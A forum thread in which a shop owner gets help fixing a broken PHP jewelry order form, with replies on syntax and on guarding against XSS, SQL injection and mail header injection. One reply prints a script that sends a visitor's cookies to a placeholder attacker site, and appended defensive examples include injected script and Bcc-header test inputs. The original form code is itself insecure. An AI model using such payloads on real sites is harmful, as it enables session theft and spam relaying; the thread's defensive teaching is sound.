Old 10-08-2008, 01:55 AM   #1 (permalink)
sacred_tinker (The Wanderer)
PHP fill in form help

Hey!

So, I have a website that's all coded with HTML, except for the fill-in form (order form) that's coded with PHP.

I have three issues with my PHP code.
1) I've uploaded my code onto my website but when I go there I get this message:
Parse error: parse error, unexpected $ in /home/content/l/e/o/leopoldine/html/order.php on line 1008
but the issue is that there are only 1007 lines in my whole code!

2) When you hit submit, I receive an email telling me what the person filled in. But once you hit submit, the thanks-for-your-order page doesn't show up.

3) I have PHP Editor 2.22 and when I open my code in it, this "window" thingy is highlighted in red and underlined:
<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.mywebsite.com/ordersent.php";>
</script>


Could someone please help me?

Old 10-08-2008, 02:08 AM   #2 (permalink)
Enfernikus (The Addict)

1) Paste your script
2)

PHP Code:
<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.mywebsite.com/ordersent.php";>
</script> 
is more correctly written like so

PHP Code:
<script language="JavaScript" type="text/JavaScript">
window.location.href = "http://www.mywebsite.com/ordersent.php";
</script> 

Old 10-08-2008, 02:38 AM   #3 (permalink)
sacred_tinker (The Wanderer)

PHP Code:
<?php



include("emailtemplate.php");






if(isset($_POST['submit'])) { 



#=============================================

#    Check if the required fields were entered

#=============================================



if(!$_POST['txt_name']) { die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>'); }

else if(!$_POST['txt_address']) { die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>'); }









#=============================================

#    Protect against XSS and hackers

#=============================================



$name = addslashes($_POST['txt_name']);

$email = addslashes($_POST['txt_email']);



if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$", $email)) { die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); }





$txt_msg = addslashes($_POST['txt_msg']);

$txt_address = addslashes($_POST['txt_address']);



$chk_purchase = $_POST['chk_purchase'];

$chk_fixpurchase = $_POST['chk_fixrepair'];



$drop_mod1 = $_POST['drop_mod1'];

$drop_mod2 = $_POST['drop_mod2'];

$drop_mod3 = $_POST['drop_mod3'];

$drop_mod4 = $_POST['drop_mod4'];

$drop_mod5 = $_POST['drop_mod5'];



$drop_payment = $_POST['drop_payment'];

$drop_delivery = $_POST['drop_delivery'];

$drop_choice = $_POST['drop_choice'];



if($_POST['drop_payment'] == "d1") {



#============================

#    Paypal was selected

#    Assign the values

#============================



$paypal_name = $_POST['paypal_name'];

$paypal_email = $_POST['paypal_email'];



$paypal_msg = "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";

}





#======================================================

#    Send email

#======================================================

// To send HTML mail, the Content-type must be set
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

// Additional headers
$headers .= 'To: Tinkas <formreciever@live.com>' . "\r\n";
$headers .= 'From: formreciever@live.com <formreciever@live.com>' . "\r\n";

$subject = "An order has been placed!";






$sentmail = mail($to,$subject,$message,$headers);

?>



<html>



<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Tinka's Trinkets - (www.leopoldine.com/TinkasTinkets)</title>

<STYLE TYPE="text/css">
<!--
BODY
   {
   font-family:arial;
   }
-->
</STYLE>
<style type="text/css">



#d1 { display:none; }



</style>

<script language="javascript">



            var oldD="";

            function show(o){

                if(oldD!="") oldD.style.display='none';

                if(o.selectedIndex>0){

                    var d=document.getElementById(o[o.selectedIndex].value);

                    d.style.display='block';

                    oldD=d;

                }

            }

        </script>



</head>



<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">



<basefont face="arial, veradana">



<table border="0" width="959" id="table1">

    <tr>

        <td width="958">

        <table border="0" width="100%" id="table7">

            <tr>

                <td>

        <img border="0" src="pics/tt/ttbanner.jpg" width="951" height="116"></td>

            </tr>

        </table>

        <table border="0" width="100%" id="table6">

            <tr>

                <td bgcolor="#29CAE1">

                <font size="2">

                &nbsp;<a href="index.htm" style="text-decoration:none"><font color="#000000">leopoldine-jpm.com</font></a>

                &gt; Tinka's Trinkets &gt; Place an Order</font></td>

            </tr>

        </table>

        <table border="0" width="957" id="table2">

            <tr>

                <td rowspan="3" width="159" align="center" bgcolor="#A6DD00">

                <p align="left"><br>

                <b><font face="Arial" size="2">&nbsp;&nbsp;

                </font><a href="index.htm">

                <font face="Arial" size="2" color="#000000">

                <span style="text-decoration: none">Main</span></font></a></b></p>

                <p align="left">

                        <b>

                        <font color="#008000" size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttindex.htm" style="text-decoration:none">

                        <font size="2" face="Arial" color="#000000">Tinka's Trinkets Home</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttnaturale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Natural Elements</font></a></b></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmetale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Metal Elements</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmisc.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Miscellaneous</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        </b><a href="ttarchives.htm" style="text-decoration: none">

                        <b><font face="Arial" size="2" color="#000000">Design 

                        Archives</font></b></a></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttcatalog.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Catalog</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <font color="#008000" size="2" face="Arial">Place an Order</font></a></b></p>

                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                </td>

                <td width="788" align="center" height="100">

                  <p align="center"><b><font size="5">Place an Order</font></b></p>

                    <p align="center"><font size="2">If you're interested in 

                    purchasing earrings or getting some of you jewelry repaired 

                    please fill in the form below:</font></p>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                </td>

            </tr>

            <tr>

                <td width="788" align="center" height="204">

                <font size="2">

                <html>

</b></font><font size="4">Jewelry Order From</font></font>

<form action="http://www.leopoldine-jpm.com/cgi-bin/FormMail.php" method="post">

<table cellpadding="3" id="table8">

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Full Name:</b></font><font face="Arial"><br>

    <input type="text" name="txt_name" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Your Email:</b></font><font face="Arial"><br>

    <input type="text" name="txt_email" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>I'd like to:</b><br>

    

    <select name="drop_choice">

    <option value="Purchase Jewelry">Purchse Jewelry</option>

    <option value="Fix or Repair Jewelry">Fix/Repair Jewelry</option>

    </select>



    

</td>

</tr>

<tr>

<td style="font-size; font-family; color">

<font size="2" face="Arial"><b>Select the models you wish to order:<br>

</b></font><i><font face="Arial" size="2" color="#666666">(If you do not wish to 

purchase any jewelry (or would like to purchase less than 5 pairs/sets), leave 

the boxes on the &quot;select&quot; option)</font></i><font face="Arial"><br>

<select name="drop_mod1">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</optgroup>

</select>





<select name="drop_mod2">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod3">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod4">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp; </font>

<select name="drop_mod5">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><br>

&nbsp;</font></td>

</tr>

<tr><td style="font-size; font-family; color"><font face="Arial"><b><font size="2">Message:<br>

    </font></b><font size="2"><i><font color="#666666">[In your message, please 

    specify the <u>quantity</u> of each model of earring you would like to order 

    (if you are ordering more than one pair) and specify any <u>modifications</u> 

    you would like to have made on the models you have selected (or to the 

    jewelry you would like to have fixed). If you are paying via Paypal, please 

    specify your Paypal email address).]</font></i><br></font>

    <textarea rows="10" cols="95" name="txt_msg">

Type your message here.

</textarea><br>

&nbsp;</font></td></tr>

<tr>

    <td height="47" style="font-size; font-family; color">

    

    <font face="Arial" size="2"><b>Method of Payment:</b></font>

    

      <select name="drop_payment" onChange="show(this)">

    <option value="Cash" rel="none">Cash</option>

    <option value="d1" >Paypal</option>

    </select>

    

    <br/>

    

    <div id="d1" style="font-family:verdana; font-size:10pt; color:#000066; border:1px solid ##A6ACB3; background-color:#FAFCF7; width:40%; padding:10px;">

   <p>You selected Paypal, please enter your name and email address that you entered into your paypal account.</p><br/>

    <table border="0" style="font-family:verdana; font-size:10pt; color:#000066; ">

    <tr>

    <td>Name:</td>

    <td><input type="text" name="paypal_name"></td>

    </tr>

    <tr>

    <td>Email:</td>

    <td><input type="text" name="paypal_email"></td>

    </tr>

    </table>

    </div>

    

    

    

&nbsp;</td></tr>

<tr><td style="font-size; font-family; color"><font face="Arial" size="2"><b>Delivery:</b></font><br>

    

    <select name="drop_delivery">

    <option value="Local">Local Pick-up (meet up)</option>

    <option value="Domestic">Domestic Postage (within Singapore)</option>

    <option value="International">International Postage</option>

    </select>

    <br>

    <font color="#666666" size="2" face="Arial"><i>(Handling is free of charge but 

    postage fees apply)</i></font>

</td>

</tr></td></tr>

<tr><td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Address: </b></font>

    <font face="Arial"><br>

    <textarea rows="10" cols="30" name="txt_address">

Type your address here.

</textarea><br>

&nbsp;</font></td></tr>

 <tr><td align="center" style="font-size; font-family; color">

<p align="left"><font face="Arial"><input type="submit" value="Submit" name="submit"><font size="2"> </font> <input type="reset" value="Clear"></font></p>

<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.leopoldine-jpm.com/ttordersent.php";>
</script>

    </td></tr>

</table>

</p>

</form>

                <p>&nbsp;</p>

</font>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                  <font size="2">

<p>In case the fill out form doesn't work, or you have any 

                questions, feel free to send me an 

                email:<br>

</font><a href="mailto:formreciever@live.com">

                <font face="Arial" color="#008000" size="3"><b>Click

        here to send me an e-mail!</b></font></a></p>

                <hr width="788" style="background-color: #000000" color="#29CAE1">

                </td></p>

            </tr>

            <tr>

                <td width="788" align="center"><font size="2"><font face="Arial" size="2"><!--[if gte mso 9]>

                <![endif]--><b>Contact</b></font><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

                  <u>E-mail:</u> </font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2">formreciever@live.com</font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

&nbsp;</font></span></font></td>

            </tr>

                    </table>

    <table border = "0" height="23">

  <tr>

    <td><hr width="950" style="background-color: #000000"></td>

  </tr>

</table>

<center><font color="#000000" face="Arial" size="1">[This site is best viewed with a 1024 x 768 screen resolution]<br>

© <em><small><small>Images, </small></small><small><small>content &amp; design</small></small><small><small>

copyright 2008 by Léopoldine Dubrulle 

(Tinka). &nbsp; All rights reserved</small></small></em></center>

    </font>

            </tr>

        </table>

</form>

</body>

</html>

Old 10-08-2008, 10:05 AM   #4 (permalink)
ReSpawN (The Frequenter)

As it stands, I am not sure whether else if() is allowed. PHP usually copes well with just elseif. JavaScript, on the other hand, uses else if instead of elseif. :) I think your first problem might be there.

As Enfernikus also told you, NEVER and I mean NEVER use unregular expressions in your script (JavaScript). < and > are operators, which are not to be used outside a comparison of sorts. This includes if, else, for, try, catch and so forth.

More to the point, I think your problem lies with the else if.
__________________
"Life is a bitch, take that bitch on a ride"

Old 10-08-2008, 10:41 AM   #5 (permalink)
sketchMedia (The Prestige)

the IF:
PHP Code:
if(isset($_POST['submit'])) { 
isn't properly closed.

A few things about your code.

Try to format it better: one-line IFs can harm readability if they are large in length, and statements also need to be properly indented.
Try to control the amount of white space used to separate different sections, and your comments, whilst informative, are very bulky and cloud the code; reducing them to one-liners and removing comments from obvious code will help.

This excellent post by VillageIdiot will give you more information about formatting code.
Writing Clean Code

Also using preg_match instead of eregi is faster:
PHP Code:
if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/i", $email)) { 
    // the trailing i modifier keeps the match case-insensitive, as eregi was
    die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); 
}

Note I had to add the two expression delimiters '/' to the start and finish of the expression.

XSS/SQL INJECTION: the addslashes isn't going to be enough to protect against XSS, and also if the data is going to be inputted into a database it also won't protect against SQL injection.

Remember: FIEO (Filter Input Escape Output)

Using mysql_real_escape_string will protect you from SQL injection, whilst using something like htmlentities to convert the special html tags to their entity codes would be a start, it would make this malicious code fail:
html Code:
<script>
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
</script>

would be converted to:
html Code:
&lt;script&gt;
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
&lt;/script&gt;
And not executed by the browser.

Although it's not foolproof by any means, it's a start.

More info: Chris Shiflett: Foiling Cross-Site Attacks

But to answer your question fully, there is a missing '}'.
__________________
mysql> SELECT * FROM `users` WHERE `users`.`clue` > 0;
Empty set (0.00 sec)
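
Added example (not part of the post above, and not the thread authors' code): one way to apply "filter input, escape output" to the fields of the posted order form before they go into the HTML email body. The field names come from the form; the allow-lists, helper names, length limits, UTF-8 charset and sample values are assumptions.

```php
<?php
// Added example, not code from the thread. Field names come from the posted
// form; the allow-lists, helper names and sample values are assumptions.

// Filter input: a <select> can only legitimately send one of its own values.
const DELIVERY_OPTIONS = ['Local', 'Domestic', 'International'];
const PAYMENT_OPTIONS  = ['Cash', 'd1'];

function pick_allowed(array $post, string $field, array $allowed): string
{
    $value = $post[$field] ?? null;
    if (!is_string($value) || !in_array($value, $allowed, true)) {
        throw new InvalidArgumentException("Unexpected value for $field");
    }
    return $value;
}

function text_field(array $post, string $field, int $maxLen): string
{
    $value = $post[$field] ?? '';
    // A crafted request can send an array (txt_name[]=x) instead of a string.
    if (!is_string($value) || trim($value) === '' || strlen($value) > $maxLen) {
        throw new InvalidArgumentException("Missing or oversized $field");
    }
    return trim($value);
}

// Escape output: encode for the context the value lands in, here HTML.
// The charset given here must match the one declared in the email headers.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function build_order_body(array $post): string
{
    $delivery = pick_allowed($post, 'drop_delivery', DELIVERY_OPTIONS);
    $payment  = pick_allowed($post, 'drop_payment', PAYMENT_OPTIONS);
    $name     = text_field($post, 'txt_name', 100);
    $msg      = text_field($post, 'txt_msg', 2000);

    return '<p>Name: ' . html($name) . '</p>'
         . '<p>Delivery: ' . html($delivery) . ', payment: ' . html($payment) . '</p>'
         . '<p>' . nl2br(html($msg)) . '</p>';
}

// Constructed submission: the message field carries markup.
$sample = [
    'txt_name'      => "O'Brien",
    'txt_msg'       => "<script>alert('x')</script>\nTwo pairs of Tiki Hoops please",
    'drop_delivery' => 'Domestic',
    'drop_payment'  => 'Cash',
];

// addslashes() only backslash-escapes quotes; the tags are still live markup.
echo addslashes($sample['txt_msg']), "\n\n";

// The same text, HTML-encoded: the mail client renders it as plain text.
echo build_order_body($sample), "\n\n";

// A value the dropdown never offers is rejected before it reaches the email.
try {
    build_order_body(['drop_delivery' => 'Teleport'] + $sample);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```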

Old 10-08-2008, 11:32 AM   #6 (permalink)
sacred_tinker (The Wanderer)

Eeeeep!
I'm sooo lost! Someone made this code for me so I have no clue what's happening or what to do! >.<

Old 10-08-2008, 12:28 PM   #7 (permalink)
sketchMedia (The Prestige)

I think this is what the code should be like (minus the html):
PHP Code:
include 'emailtemplate.php';

if(isset($_POST['submit']))
{
    if(!$_POST['txt_name'])
    {
        die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>');
    }
    elseif(!$_POST['txt_address'])
    {
        die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>');
    }

    $name  = addslashes($_POST['txt_name']);
    $email = addslashes($_POST['txt_email']);

    // the trailing i modifier keeps the match case-insensitive, as eregi was
    if(!preg_match('/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/i', $email))
    {
        die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>');
    }

    $txt_msg         = addslashes($_POST['txt_msg']);
    $txt_address     = addslashes($_POST['txt_address']);
    $chk_purchase    = $_POST['chk_purchase'];
    $chk_fixpurchase = $_POST['chk_fixrepair'];

    $drop_mod1 = $_POST['drop_mod1'];
    $drop_mod2 = $_POST['drop_mod2'];
    $drop_mod3 = $_POST['drop_mod3'];
    $drop_mod4 = $_POST['drop_mod4'];
    $drop_mod5 = $_POST['drop_mod5'];

    $drop_payment  = $_POST['drop_payment'];
    $drop_delivery = $_POST['drop_delivery'];
    $drop_choice   = $_POST['drop_choice'];

    if($_POST['drop_payment'] == "d1")
    {
        $paypal_name  = $_POST['paypal_name'];
        $paypal_email = $_POST['paypal_email'];
        $paypal_msg   = "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";
    }

    // To send HTML mail, the Content-type must be set
    $headers  = 'MIME-Version: 1.0' . "\r\n";
    $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

    // Additional headers
    $headers .= 'To: Tinkas <formreciever@live.com>' . "\r\n";
    $headers .= 'From: formreciever@live.com <formreciever@live.com>' . "\r\n";

    $subject = 'An order has been placed!';

    $sentmail = mail($to, $subject, $message, $headers);
}

That will now run, however the script doesn't seem to do anything apart from send an email saying 'an order was placed'

If you are going to use POST variables inside an email, you will have to be careful of mail injection; much like SQL injection, extra code can be injected into the script. This is usually a favourite exploit of spammers, who can use your form to spam. Usually the way to combat this is to check for any new lines and carriage returns from user input (\n\r).
PHP Code:
if(preg_match("/(\r|\n)/i", $input)) { 
    // no $ anchor: reject a CR or LF anywhere in the input, not only at its end
    die('Dont try and inject stuff into the email, it really is rather exasperating.'); 
}

Should work (I'm not the best at regex so there are probably ways around it).
__________________
mysql> SELECT * FROM `users` WHERE `users`.`clue` > 0;
Empty set (0.00 sec)
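
Added example (not part of the post above, and not the thread authors' code): the newline check applied to values that end up in mail headers, run over a few constructed inputs. Putting the customer's name and address into a Reply-To header is an assumption (the posted script uses fixed headers), as are the helper names and sample values.

```php
<?php
// Added example, not code from the thread. The Reply-To use case, the helper
// names and the sample values are assumptions.

function has_line_break(string $value): bool
{
    // CR or LF anywhere in the value, not only at its end.
    return preg_match('/[\r\n]/', $value) === 1;
}

function reply_to_header(string $name, string $email): string
{
    if (has_line_break($name) || has_line_break($email)) {
        throw new InvalidArgumentException('Line break in header value');
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('Invalid email address');
    }
    // Drop characters that would end the quoted display name early.
    $display = str_replace(['"', '\\'], '', $name);
    return 'Reply-To: "' . $display . '" <' . $email . '>';
}

function order_headers(string $name, string $email): string
{
    // Fixed headers as in the posted script, plus the one user-derived header.
    return implode("\r\n", [
        'MIME-Version: 1.0',
        'Content-type: text/html; charset=iso-8859-1',
        'From: formreciever@live.com',
        reply_to_header($name, $email),
    ]);
}

// Constructed inputs: one ordinary, three carrying line breaks.
$samples = [
    ['Ann Lee', 'ann@example.com'],
    ['Ann Lee', "ann@example.com\r\nBcc: someone@example.net"],
    ["Ann Lee\nX-Added: 1", 'ann@example.com'],
    ["Ann Lee\n", 'ann@example.com'],
];

foreach ($samples as [$name, $email]) {
    try {
        echo "accepted:\n", order_headers($name, $email), "\n\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n\n";
    }
}
```

Only the first sample is accepted; the check has to run on every value that is concatenated into the headers or subject, not only on the address field.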